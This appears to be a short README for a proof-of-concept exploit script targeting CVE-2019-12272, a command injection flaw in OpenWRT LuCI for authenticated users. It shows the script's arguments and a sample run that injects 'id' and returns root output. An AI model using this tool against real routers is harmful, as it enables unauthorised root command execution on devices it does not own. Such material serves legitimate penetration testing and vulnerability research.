CVE-2019-12272

CVE-2019-12272 OpenWRT LuCI - Command Injection vulnerability for authenticated users

usage: cve-2019-12272.py [-h] -a ADDRESS -u USERNAME -p PASSWORD -c COMMAND

cve-2019-12272.py

optional arguments:

-h, --help show this help message and exit

required named arguments:

-a ADDRESS, --address ADDRESS Luci host address

-u USERNAME, --username USERNAME Luci username

-p PASSWORD, --password PASSWORD Luci password

-c COMMAND, --command COMMAND Command to inject

$ python3 cve-2019-12272.py -a host -u user -p pass -c id

[+] out=b'uid=0(root) gid=0(root)\n'

Provide feedback